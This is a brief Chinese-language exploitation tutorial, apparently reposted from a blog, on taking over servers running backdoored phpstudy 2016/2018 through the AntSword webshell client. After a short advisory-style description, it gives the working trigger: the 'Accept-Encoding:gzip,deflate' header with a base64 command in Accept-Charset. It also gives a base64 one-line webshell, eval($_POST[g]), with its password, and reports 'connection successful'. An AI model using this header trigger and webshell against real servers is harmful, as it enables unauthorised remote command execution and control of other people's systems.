利用中国蚁剑无文件连接 phpstudy 后门方法
0x01 描述
Phpstudy 是一款 PHP 调试环境的程序集成包, 集成了最新的 Apache,PHP,phpMyAdmin,ZendOptimizer 等多款软件一次性安装, 无需配置, 即装即用. 由于其免费且方便的特性, 在国内有着近百万的 PHP 语言学习者, 开发者用户.
后门名称: Phpstudy 后门
威胁等级: 严重
影响范围: Phpstudy 2016,phpstudy2018
后门类型: C&C, 命令执行
利用难度: 极易
0x02 复现
利用工具: 中国蚁剑
phpstudy:2016 PHP-5.4.45
Accept-Encoding:gzip,deflate
Accept-Charset:base64 加密执行的命令
一句话木马: ZXZhbCgkX1BPU1RbZ10pOw==
密码: g
配置 HTTP 消息头
连接成功
来源: http://www.bubuko.com/infodetail-3216509.html